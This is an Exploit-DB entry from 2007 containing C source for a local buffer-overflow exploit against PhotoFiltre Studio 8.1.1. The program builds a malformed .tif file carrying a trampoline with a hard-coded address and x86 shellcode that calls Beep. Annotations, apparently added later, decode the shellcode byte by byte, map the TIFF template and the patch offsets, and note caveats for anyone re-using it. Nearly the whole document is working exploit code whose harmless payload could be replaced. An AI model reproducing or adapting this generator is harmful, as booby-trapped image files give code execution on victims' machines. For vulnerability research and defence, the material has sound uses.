PhotoFiltre Studio 8.1.1 - '.tif' Local Buffer Overflow

EDB-ID:

3772


Author:

Marsu

Type:

local


Platform:

Windows

Date:

2007-04-21


/********************************************************************************
*                                                                               *
*            Photofiltre Studio v8.1.1 .TIF File Buffer Overflow                *
*                                                                               *
*                                                                               *
* Photofiltre is vulnerable to an unspecified buffer overflow when processing a *
* crafted .TIF file.                                                            *
* This exploit just beeps (useless but incredibly noisy!!).                     *
*                                                                               *
* Tested against Win XP SP2 FR.                                                 *
* Have Fun!                                                                     *
*                                                                               *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>                    *
********************************************************************************/

#include "stdio.h"
#include "stdlib.h"
#include <string.h>   /* memcpy: previously used without a prototype */

// Beep shellcode by xnull, written as a brace initializer instead of a
// string literal. The explicit trailing 0x00 keeps sizeof(beepsp2) at 36,
// so main()'s `sizeof(beepsp2)-1` still copies exactly the 35 payload bytes.
//
// What the bytes decode to (x86, 32-bit):
//   55                  push ebp
//   89 e5               mov  ebp, esp
//   83 ec 18            sub  esp, 0x18
//   c7 45 fc 77 7a 83 7c  mov dword [ebp-4], 0x7c837a77  ; Beep address, SP2 (per original note)
//   c7 44 24 04 d0 03 00 00  mov dword [esp+4], 2000     ; length: 2000 = 2 seconds
//   c7 04 24 01 0e 00 00  mov dword [esp], 3585          ; frequency 3585
//   8b 45 fc            mov  eax, [ebp-4]
//   ff d0               call eax
//   c9                  leave
//   c3                  ret
//
// Caveats a re-user should know: the call target is an absolute address that
// only holds on the tested Win XP SP2 FR build (no lookup, no egg hunt), and
// the final `ret` pops whatever the overflow left above this frame, so the
// host is presumably not returned to a sane state afterwards. The payload
// contains 0x00 bytes, which is fine here because it is written to a file,
// not passed through a C string.
unsigned char beepsp2[] = {
	0x55, 0x89, 0xE5,             // push ebp; mov ebp, esp
	0x83, 0xEC, 0x18,             // sub esp, 0x18
	0xC7, 0x45, 0xFC,             // mov dword [ebp-4], imm32 ...
	0x77, 0x7A, 0x83, 0x7C,       //   ... = 0x7c837a77 (SP2 address)
	0xC7, 0x44, 0x24, 0x04,       // mov dword [esp+4], imm32 ...
	0xD0, 0x03, 0x00, 0x00,       //   ... = 2000 (2 seconds)
	0xC7, 0x04, 0x24,             // mov dword [esp], imm32 ...
	0x01, 0x0E, 0x00, 0x00,       //   ... = 3585 (frequency)
	0x8B, 0x45, 0xFC,             // mov eax, [ebp-4]
	0xFF, 0xD0,                   // call eax
	0xC9, 0xC3,                   // leave; ret
	0x00                          // terminator, mirrors the string-literal NUL
};

/*
 * 1360-byte TIFF template (85 lines x 16 bytes) that main() patches in place
 * and writes out verbatim. What the bytes show:
 *   - offset 0: "II" (little-endian), magic 42, first IFD at offset 8
 *   - offset 8: IFD entry count 0x17 = 23, followed by 12-byte entries
 *   - the Compression entry (tag 0x0103) carries a count of 0x83 = 131 rather
 *     than 1, and the tag-0x010a entry has a type field of 0xb6, which is not
 *     a defined TIFF field type; which malformed field actually trips the
 *     parser is not established anywhere in this PoC
 *   - from offset 0xd6 (tag 0x0131) on, the IFD degenerates into 'D','C',
 *     'B','A' and then runs of 'E'..'O' filler, presumably the cyclic pattern
 *     used to locate the overwrite offset
 * main() overwrites bytes 0xd5..0xfd (213..256) of this array with the 9-byte
 * trampoline and the 35-byte beepsp2 payload; every other byte is written as-is.
 */
char tif_file_part1[] =
"\x49\x49\x2a\x00\x08\x00\x00\x00\x17\x00\xfe\x00\x04\x00\x01\x00" // "II", 42, IFD @8, 23 entries, first entry tag 0x00fe
"\x00\x00\x02\x00\x00\x00\x00\x01\x04\x00\x01\x00\x00\x00\xfd\x01"
"\x00\x00\x01\x01\x04\x00\x01\x00\x00\x00\xb6\x01\x00\x00\x02\x01"
"\x03\x00\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00\x83\x00"
"\x00\x00\x05\x00\x00\x00\x06\x01\x03\x00\x01\x00\x00\x00\x03\x00" // tag 0x0103 (Compression): type 3, count 0x83, value 5
"\x00\x00\x0a\x01\xb6\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01" // tag 0x010a: type field 0x00b6 is not a TIFF field type
"\x04\x00\x37\x00\x00\x00\x22\x01\x00\x00\x12\x01\x03\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x15\x01\x03\x00\x01\x00\x00\x00\x01\x00"
"\x00\x00\x16\x01\x03\x00\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01"
"\x04\x00\x37\x00\x00\x00\xfe\x01\x00\x00\x1a\x01\x05\x00\x01\x00"
"\x00\x00\xda\x02\x00\x00\x1b\x01\x05\x00\x01\x00\x00\x00\xe2\x02"
"\x00\x00\x1c\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x28\x01"
"\x03\x00\x01\x00\x00\x00\x02\x00\x00\x00\x29\x01\x03\x00\x02\x00"
"\x00\x00\x00\x00\x01\x00\x31\x01\x02\x44\x43\x42\x41\x45\x45\x45" // tag 0x0131 then "DCBA" + 'E' filler; main() patches from this line's 6th byte (file offset 0xd5)
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4f\x4f\x4f\x4f\x4f"
"\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x92\x00\x92" // end of the 'E'..'O' filler; trailing data follows
"\x00\x96\x00\x00\x00\x00\x00\xaf\x00\x12\x00\x00\x00\x92\x00\x49"
"\x00\x12\x00\x92\x00\xaf\x00\x92\x00\x49\x00\x49\x00\x49\x00\x58"
"\x00\xaf\x00\x12\x00\x58\x00\x00\x00\x80\x00\x00\x00\x57\x00\x12"
"\x00\x5a\x00\x12\x00\x00\x00\x00\x00\x28\x00\x12\x00\x00\x00\x46"
"\x00\xfd\x00\xd5\x00\x1b\x00\xff\x00\xef\x00\xa9\x00\xd9\x00\x00"
"\x00\x70\x00\x6c\x00\xfa\x00\x99\x00\xc5\x00\xf7\x00\xb4\x00\x48"
"\x00\xab\x00\xe9\x00\xde\x00\x1b\x00\xff\x00\xd7\x00\x64\x00\xa9"
"\x00\xd9\x00\x6e\x00\x68\x00\x70\x00\x92\x00\xcc\x00\xf2\x00\x99"
"\x00\x94\x00\xe9\x00\xad\x00\xb4\x00\x4b\x00\xc9\x00\x85\x00\xe9"
"\x00\xe5\x00\xb4\x00\x80\x00\x98\x00\x8c\x00\xe0\x00\xc4\x00\x33"
;

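/*
 * Entry point: assemble the crafted .tif in memory and write it to argv[1].
 *
 * Resulting file (1360 bytes, i.e. sizeof(tif_file_part1) - 1):
 *   [0x000, 0x0d5)  tif_file_part1 untouched (TIFF header + IFD)
 *   [0x0d5, 0x0de)  9-byte trampoline: 2 filler bytes, "\xeb\x05" (jmp short
 *                   +5, which skips the following 5 bytes), the hard-coded
 *                   address 0x7ffc088c, 1 filler byte
 *   [0x0de, 0x101)  beepsp2 (35 bytes)
 *   [0x101, 0x550)  tif_file_part1 untouched
 *
 * The original comment calls the address a "pop pop ret in ???": the owning
 * module was never identified, and the value is only known to hold on the
 * Win XP SP2 FR box the PoC was tested on. The jmp-short / address / payload
 * layout reads like an SEH overwrite, but that is inferred, not shown here.
 *
 * Fixes relative to the original: memcpy is now declared (<string.h>), the
 * usage line names a .tif rather than .ttf, the write length is derived from
 * the template instead of a duplicated magic 1360, fwrite/fclose results are
 * checked, and error paths exit non-zero instead of 0.
 *
 * Returns EXIT_SUCCESS when the whole file was written, EXIT_FAILURE on bad
 * usage or any I/O error.
 */
int main(int argc, char* argv[])
{
	FILE* tiffile;
	char evilbuff[5000];
	/* Trampoline bytes from the original PoC; kept verbatim. */
	static const unsigned char trampoline[] =
		"\x43\x43\xeb\x05\x8c\x08\xfc\x7f\x43";
	const size_t template_len = sizeof(tif_file_part1) - 1;   /* 1360 */
	const size_t tramp_len = sizeof(trampoline) - 1;          /* 9 */
	const size_t sc_len = sizeof(beepsp2) - 1;                /* 35 */
	const size_t offset = 0xd5;                               /* patch point */

	printf("[+] Photofiltre Studio v8.1.1 .TIF File Buffer Overflow\n");
	printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");
	if (argc != 2) {
		/* argv[0] may be NULL when argc == 0; never hand %s a null pointer. */
		printf("[+] Usage: %s <file.tif>\n", argc > 0 ? argv[0] : "exploit");
		return EXIT_FAILURE;
	}

	/* Both guards hold for the constants above (1360 <= 5000, 213+9+35 = 257
	 * <= 1360); they only exist so that swapping in a longer payload fails
	 * loudly instead of running memcpy past the end of either array. */
	if (template_len > sizeof(evilbuff) ||
	    offset + tramp_len + sc_len > template_len) {
		printf("[-] Payload does not fit in the template.\n");
		return EXIT_FAILURE;
	}

	memcpy(evilbuff, tif_file_part1, template_len);
	memcpy(evilbuff + offset, trampoline, tramp_len);       /* pop pop ret in ??? + jump over EIP */
	memcpy(evilbuff + offset + tramp_len, beepsp2, sc_len);

	printf("[+] tif_file_part2 patched!\n");

	if ((tiffile = fopen(argv[1], "wb")) == NULL) {
		printf("[-] Unable to access file.\n");
		return EXIT_FAILURE;
	}

	/* Only the first template_len bytes of evilbuff were ever initialised;
	 * writing exactly that many keeps uninitialised stack out of the file.
	 * A short write would leave a truncated, useless sample behind, so it
	 * is treated as an error. */
	if (fwrite(evilbuff, 1, template_len, tiffile) != template_len) {
		printf("[-] Short write.\n");
		fclose(tiffile);
		return EXIT_FAILURE;
	}
	if (fclose(tiffile) != 0) {
		printf("[-] Unable to close file.\n");
		return EXIT_FAILURE;
	}
	printf("[+] Done. Have fun!\n");
	return EXIT_SUCCESS;
}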

// milw0rm.com [2007-04-21]